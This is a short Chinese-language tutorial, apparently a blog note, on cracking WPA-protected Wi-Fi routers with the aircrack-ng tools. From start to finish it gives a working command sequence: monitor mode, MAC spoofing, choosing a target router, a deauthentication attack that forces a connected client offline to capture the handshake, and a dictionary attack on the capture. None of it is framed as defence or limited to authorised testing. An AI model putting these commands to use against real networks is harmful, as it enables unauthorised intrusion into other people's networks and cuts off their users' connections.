破解wpa加密路由器的原理不同于破解wep加密路由器,只能通过暴力破解获取。
但是获取握手keystream的原理差不多
首先杀死可能会和破解冲突的进程 airmon-ng check kill
开启网卡monitor模式 airmon-ng start wlan0
修改mac之前先停掉网卡 ifconfig wlan0mon down,修改mac macchanger -m 00:11:22:33:44:55 wlan0mon,再开启网卡 ifconfig wlan0mon up
查看网卡工作的信道 iwlist wlan0mon channel
修改信道之前先停掉 airmon-ng stop wlan0mon,开启时加上信道号,airmon-ng start wlan0 <信道号> , 再查看工作信道就会发现已更改。
开始侦听airodump-ng wlan0mon 按"A"键切换查看,在大量的信息中挑选一个路由器作为目标 airodump-ng -c <信道号> --bssid <目标路由器mac> -w <生成文件名> 网卡
这里显示的是目标路由器下连接的设备,选择其中的一个设备进行断网攻击已获得handshak
aireplay-ng -0 <攻击次数> -a <路由器mac> -c <客户端mac> <网卡名>
并在当前文件夹下生成一个.cap文件
开始破解 aircrack-ng -w <字典文件> wpa-01.cap